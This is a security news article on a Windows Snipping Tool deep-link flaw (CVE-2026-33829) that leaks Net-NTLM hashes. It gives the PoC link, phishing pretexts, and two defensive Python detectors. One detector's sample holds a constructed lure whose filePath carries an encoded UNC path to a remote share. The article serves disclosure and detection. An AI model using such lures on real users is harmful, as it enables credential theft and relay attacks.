A proof-of-concept (PoC) exploit has been made publicly available for a recently uncovered vulnerability in Microsoft’s Snipping Tool that enables attackers to covertly obtain users’ Net-NTLM credential hashes by luring them to a malicious web page.
Designated as CVE-2026-33829, the weakness lies in how Windows Snipping Tool processes the deep link it registers under the ms-screensketch URI scheme. Affected versions register this deep link handler, which accepts a filePath parameter.
Due to insufficient input validation, an attacker can provide a UNC path leading to a remote, attacker-controlled SMB server, forcing an authenticated SMB connection and capturing the victim’s Net-NTLM hash during the process.
The vulnerability was identified and reported by security experts at Black Arrow, who coordinated the disclosure with Microsoft prior to its public release.
Windows Snipping Tool PoC
Exploitation requires minimal technical prowess. An attacker only needs to host a malicious URL, or an HTML page that automatically triggers the deep link, and persuade the target to visit it. The PoC from Black Arrow Security illustrates the attack with a single browser-activated URI:

```text
ms-screensketch:edit?&filePath=file.png&isTemporary=false&saved=true&source=Toast
```

When a victim clicks this link, Snipping Tool opens and quietly tries to load the remote resource via SMB. During this connection attempt, Windows automatically sends the user’s Net-NTLM authentication response to the attacker’s server, revealing credentials that can subsequently be cracked offline or used in NTLM relay attacks against internal network resources.
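A mail gateway, web proxy or EDR content filter can catch this lure before a user ever clicks it, because the dangerous part is visible in the link itself: an ms-screensketch deep link whose filePath points at a remote share. The following detector is an added example written for this article; it is not Black Arrow’s PoC nor any Microsoft code, and the sample HTML, the share name and the 192.0.2.10 host (a documentation address) are constructed. It goes slightly beyond the article’s UNC case by also treating the forward-slash //host/share form and file://host/... URLs with a non-local host as remote paths.

```python
"""Flag ms-screensketch deep links whose filePath resolves to a remote share.

Added detection example for CVE-2026-33829 lures (not the original PoC).
Inputs below are constructed; 192.0.2.10 is an RFC 5737 documentation address.
"""
import re
from urllib.parse import parse_qs

# \\host\share\..., //host/share/..., or file://host/share/... (host must be non-empty,
# so local file:///C:/... forms do not match).
REMOTE_PATH_RE = re.compile(r"^(?:file:)?(?:\\\\|//)(?P<host>[^\\/]+)[\\/]", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
DEEPLINK_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)


def classify_deeplink(uri: str) -> dict:
    """Return a verdict for a single URI; only ms-screensketch links are inspected."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() != "ms-screensketch":
        return {"scheme": scheme.lower() if sep else "", "file_path": "",
                "remote_host": None, "suspicious": False}
    _, _, query = rest.partition("?")
    # parse_qs percent-decodes values, so %5C%5C becomes \\ and blank pairs are dropped
    params = parse_qs(query)
    file_path = params.get("filePath", [""])[0].strip()
    m = REMOTE_PATH_RE.match(file_path)
    host = m.group("host") if m else None
    if host is not None and host.lower() in LOCAL_HOSTS:
        host = None
    return {"scheme": "ms-screensketch", "file_path": file_path,
            "remote_host": host, "suspicious": host is not None}


def scan_document(text: str) -> list:
    """Extract every ms-screensketch URI from a page/e-mail body and return the suspicious ones."""
    return [v for v in (classify_deeplink(u) for u in DEEPLINK_RE.findall(text)) if v["suspicious"]]


# Constructed sample: one benign deep link and one lure with a percent-encoded UNC path.
SAMPLE_HTML = """<html><body>
<a href="ms-screensketch:edit?&filePath=file.png&isTemporary=false&saved=true&source=Toast">crop</a>
<a href="ms-screensketch:edit?&filePath=%5C%5C192.0.2.10%5Cshare%5Cbadge.png&isTemporary=false&saved=true&source=Toast">badge</a>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_document(SAMPLE_HTML):
        print(f"remote filePath host {hit['remote_host']}: {hit['file_path']}")
```

Run it on a captured mail body or proxy log and alert on any hit; the benign form in the PoC (a bare file name) produces none, so the rule is quiet on legitimate Snipping Tool toasts.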

What renders CVE-2026-33829 especially hazardous is how naturally it lends itself to social engineering. Since the Snipping Tool actually opens during exploitation, the attack is visually consistent with convincing pretexts such as asking an employee to crop a company wallpaper, edit a badge image, or review an HR document.
An attacker could register a domain like snip.example.com and present a persuasive image URL that silently redirects to the malicious deep link behind the scenes.
The victim perceives nothing abnormal; the Snipping Tool opens as anticipated while NTLM authentication occurs seamlessly in the background.
This attack vector is particularly efficient in corporate settings where phishing emails pointing to internal HR portals, IT support desks, or shared document systems are prevalent.
Patch Availability and Timeline
Microsoft resolved the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline includes:
- March 23, 2026 — Vulnerability reported to Microsoft.
- April 14, 2026 — Microsoft delivers a security patch.
- April 14, 2026 — Coordinated public advisory and PoC release.
Organizations and individual users utilizing affected versions of the Windows Snipping Tool should promptly apply the April 14, 2026, security update.
Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unidentified hosts, which may signal active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a robust defensive measure irrespective of patch status.
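The monitoring recommendation above can be turned into a concrete rule over firewall or flow logs: alert on any internal host that opens an SMB connection (TCP 445, and 139 for older NetBIOS-over-TCP sessions) to an address outside the private ranges. The script below is an added example for this article, not a vendor tool; the flow-log format (timestamp, source IP, destination IP, destination port, protocol, space-separated) and the log lines themselves are constructed, and 192.0.2.10 / 198.51.100.7 are documentation addresses standing in for attacker hosts.

```python
"""Flag outbound SMB connections to non-internal hosts in flow/firewall logs.

Added detection example (not from the article's source or any vendor).
Log format and sample lines are constructed; external IPs are RFC 5737 addresses.
"""
import ipaddress
from collections import Counter

SMB_PORTS = {445, 139}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "fc00::/7", "fe80::/10", "::1/128",                # IPv6 ULA, link-local, loopback
)]


def is_internal(ip_text: str) -> bool:
    """True if the address falls inside one of the networks we consider internal."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def parse_flow(line: str):
    """Parse 'ts src dst dport proto'; return None for comments or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) != 5:
        return None
    ts, src, dst, dport, proto = fields
    if not dport.isdigit():
        return None
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto.lower()}


def find_external_smb(lines, allowed_external=frozenset()) -> list:
    """Return flows from an internal source to an SMB port on a non-internal destination.

    allowed_external lets a team exempt known-good cloud file shares by IP.
    """
    alerts = []
    for line in lines:
        flow = parse_flow(line)
        if flow is None or flow["proto"] != "tcp" or flow["dport"] not in SMB_PORTS:
            continue
        if is_internal(flow["dst"]) or flow["dst"] in allowed_external:
            continue
        if is_internal(flow["src"]):
            alerts.append(flow)
    return alerts


def summarize_by_source(alerts) -> dict:
    """Count alerts per source host so a single noisy workstation stands out."""
    return dict(Counter(a["src"] for a in alerts))


# Constructed sample flow log: one internal SMB session, two external SMB attempts, one HTTPS.
SAMPLE_FLOWS = """\
# ts src dst dport proto
2026-04-15T09:12:03Z 10.20.5.14 10.20.5.1 445 tcp
2026-04-15T09:12:41Z 10.20.5.14 192.0.2.10 445 tcp
2026-04-15T09:13:02Z 10.20.7.33 203.0.113.44 443 tcp
2026-04-15T09:14:10Z 10.20.7.33 198.51.100.7 139 tcp
malformed line here
""".splitlines()

if __name__ == "__main__":
    for a in find_external_smb(SAMPLE_FLOWS):
        print(f"{a['ts']} {a['src']} -> {a['dst']}:{a['dport']} external SMB")
    print(summarize_by_source(find_external_smb(SAMPLE_FLOWS)))
```

Because the deep link triggers the SMB connection from the user’s workstation, the alert points straight at the affected endpoint; pairing it with a perimeter rule that drops TCP 445/139 outbound turns the same condition from a detection into a block.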